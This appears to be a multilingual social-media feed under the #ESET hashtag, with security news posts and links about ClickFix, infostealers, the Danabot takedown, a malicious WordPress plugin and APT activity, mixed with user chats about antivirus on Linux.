#eset
WinRAR zero day exploited by RomCom hackers in targeted attacks https://www.helpnetsecurity.com/2025/08/11/winrar-zero-day-cve-2025-8088/ #cybersecurity #vulnerability #backdoor #software #WinRAR #News #ESET #CVE
@sidalsolgun @daniel1820815 personally, if you actually want/need some "#Antivirus" on #Linux, consider #ESET's offering...
https://help.eset.com/eeau/12/en-US/
https://www.eset.com/us/business/download/endpoint-antivirus-linux/
Personally, I consider Antivirus on Linux as #bloatware outside of #Fileserver and #eMail systems, but that's because I act as "#BenevolentDictator" and ban users from using external drives.
- But that's me who actually invests the time and effort to educate #TechIlliterates and who's working in more sensitive IT than most.
So the tolerance to violations is near zero and proven willingful infraction of ITsec rules range from getting fired to jailtime in many situations.
- Thus Antivirus, regardless in #ClamAV or commercial offerings, is not a threat when most systems require insiders (like modern "#Affiliate" #Ransomware) to plant them.
#ClickFix went from virtually non-existent to the second most common attack vector blocked by #ESET, surpassed only by #phishing. This novel social engineering technique accounted for nearly 8% of all detections in H1 2025. #ESETresearch
ClickFix lures users by displaying bogus error messages followed by quick fix instructions, including copy-pasting malicious code. Running the code in the victim’s command line interpreter delivers malware such as #RATs, infostealers, and cryptominers.
Between H2 2024 and H1 2025, ESET’s detection for ClickFix, HTML/FakeCaptcha, skyrocketed by 517%. Most detections in ESET telemetry were reported from Japan (23%), Peru (6%), and Poland, Spain, and Slovakia (>5% each).
What makes #ClickFix so effective? The fake error message looks convincing; instructions are simple, yet the copied command is too technical for most users to understand. Pasting it into cmd leads to compromise with final payloads, including #DarkGate or #LummaStealer.
While #ClickFix was introduced by cybercriminals, it’s since been adopted by APT groups: Kimsuky, Lazarus; Callisto, Sednit; MuddyWater; APT36. NK-aligned actors used it to target developers, steal crypto and passwords from Metamask and #macOS Keychain.
#ClickFix uses psychological manipulation by presenting fake issues and offering quick solutions, which makes it dangerously efficient. It appears in many forms – error popups, email attachments, fake reCAPTCHAs – highlighting the need for greater vigilance online.
Read more in the #ESETThreatReport:
https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025
After years of dominance in #ESET’s top #infostealer statistics, the era of #AgentTesla has come to an end. It finished H1 2025 in fourth place, its numbers having decreased by 57%. The reason? It is no longer under active development.
The threat actors behind Agent Tesla have reportedly lost access to the servers with the malware’s source code. A successor appeared almost immediately – another #MaaS threat, known as #SnakeStealer or #SnakeKeylogger, has claimed the number one spot.
Recommended as a suitable replacement directly in Agent Tesla’s Telegram channel, SnakeStealer now takes up almost a fifth of all infostealer detections registered by ESET telemetry. Between H2 2024 and H1 2025, its detections more than doubled.
If you want to find out more information about this changing of the guard in the infostealer threat landscape, head on over to #ESETThreatReport: https://welivesecurity.com/en/eset-research/eset-threat-report-h1-2025
ClickFix attacks skyrocketing more than 500% https://www.helpnetsecurity.com/2025/06/26/clickfix-attacks-fakecaptcha-eset-report/ #authentication #cybersecurity #cybercrime #Don'tmiss #phishing #research #attacks #scams #News #ESET
Zazwyczaj donoszę Wam (oczywiście uprzejmie) o wyciekach, kradzieżach, szpiegostwie i innych bezpiecznikowych katastrofach. Ale dziś? Mamy dwie gigantyczne wygrane w wojnie z cyberprzestępcami - i to z polskim akcentem! 
W nowym odcinku opowiadam o spektakularnym rozbiciu LummaStealera i ciosie wymierzonym w Danabota - dwóch złośliwych bestiach, które przez lata truły życie firmom i zwykłym użytkownikom na całym świecie. Jak działały? Jak je rozpracowano? Jakie miało to konsekwencje?
I co najważniejsze - jak w ogóle wygląda "fraud-as-a-service" od kuchni, łącznie z cenami, dokumentacją i obsługą klienta 24/7?
Odcinek przygotowany przy współpracy z ESET i DAGMA Bezpieczeństwo IT
Zapraszam 
https://youtu.be/fcTdhBq4U88
Analysis of a Malicious WordPress Plugin: The Covert Redirector
A malicious WordPress plugin named 'wordpress-player.php' has been discovered, affecting at least 26 websites. The plugin injects a hidden HTML5 video player and establishes a WebSocket connection to a command and control server. It redirects visitors to suspicious websites after 4-5 seconds, avoiding execution for logged-in users. The malware uses a fake 'WordPress Core' author name to evade detection. It impacts website integrity through unauthorized redirects, SEO degradation, and potential security risks to visitors. Mitigation steps include thorough scanning, malware removal, credential resets, software updates, and implementing a Web Application Firewall.
Pulse ID: 68536e4f88b62f5f7d8c4865
Pulse Link: https://otx.alienvault.com/pulse/68536e4f88b62f5f7d8c4865
Pulse Author: AlienVault
Created: 2025-06-19 01:56:31
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
https://www.europesays.com/2137357/ Iran-aligned BladedFeline spies on Iraqi and Kurdish #BackdoorWhisper #Conflicts #CyberEspionage #ESET #Iran #IranAligned #llc #OilRig #OperationRoundpress #PrimeCache #ThreatActors
The #FBI and #DCIS disrupted #Danabot. #ESET was one of several companies that cooperated in this effort. https://www.welivesecurity.com/en/eset-research/danabot-analyzing-fallen-empire/
#ESETresearch has been involved in this operation since 2018. Our contribution included providing technical analyses of the malware and its backend infrastructure, as well as identifying Danabot’s C&C servers. Danabot is a #MaaS #infostealer that has also been seen pushing additional malware – even #ransomware, such as #LockBit, #Buran, and #Crisis – to compromised systems.
We have analyzed Danabot campaigns all around the world and found a substantial number of distinct samples of the malware, as well as identified more than 1,000 C&Cs.
This infostealer is frequently promoted on underground forums. The affiliates are offered an administration panel application, a backconnect tool for real-time control of bots, and a proxy server application that relays the communication between the bots and the C&C server.
IoCs are available in our GitHub repo. You can expect updates with more details in the coming days. https://github.com/eset/malware-ioc/tree/master/danabot
An #APT group exploited #ESET flaw to execute #malware
https://securityaffairs.com/176364/security/an-apt-group-exploited-eset-flaw-to-execute-malware.html
#securityaffairs #hacking
https://www.europesays.com/de/18530/ ToddyCat: Malware nutzt Sicherheitsleck in Antivirensoftware #Antivirus #Deutschland #Eset #Germany #IT #Kaspersky #Malware #Science #Science&Technology #Security #Sicherheitslücken #Sicherheitsupdates #Technik #Technology #Virus #Wissenschaft #Wissenschaft&Technik
China-linked FamousSparrow APT group resurfaces with enhanced capabilities https://www.helpnetsecurity.com/2025/03/26/famoussparrow-cyberespionage-attacks-united-states/ #cybersecurity #cybercrime #Don'tmiss #research #China #News #ESET #APT #USA
Enemies with benefits: RansomHub and rival gangs share EDRKillShifter tool https://www.helpnetsecurity.com/2025/03/26/ransomhub-edrkillshifter-tool/ #ransomware #cybercime #research #News #ESET
@johl @bsi ich habe gerade meinen Virenschutz bei #ESET verlängert.
Und extra noch mal geschaut, wo die herkommen:
#bratislava - Save!
Was ist das für eine Welt, in der man so was vorher checken muss?
@topher #Antivirus is for the most part #Scareware aimed at scamming #TechIlliterates which at best only works against kniwn threats and at worst is literal #Malware in and of itself selling user data to bad actors.
- There are commercial AV options for major distros, like #ESET offers for all 3 big Desktop ones: @RedHat, #SUSE & #UbuntuLTS...
As for the rest one can just scan #Fileservers regularly and do so on #Mailservers, but existing tools to enforce quick and early updates on those distros already do most of the heavy lifting re: #ITsec...
Úplně nevím, jak se to podařilo ale až mi někdo z #eset za těch cca. 135 let zavolá, tak snad už budu rozhodnutej 
(fakt jsem nic nehackoval)
G◍M◍◍T 
Fine supporto Windows 10: cosa scegliere tra Windows 11 e Linux
https://gomoot.com/fine-supporto-windows-10-cosa-scegliere-tra-windows-11-e-linux/
@prealpinux @linux Ad essere precisi, #ESET consiglia l'installazione di una distribuzione #Linux come una "buona opzione" tout court, aggiungendo poi "soprattutto per l’hardware più vecchio". Dall'articolo di PI, invece, sembra che l'opzione Linux sia suggerita *solo* in relazione all'hardware datato (una sorta di soluzione di ultima istanza). #softwarelibero #opensource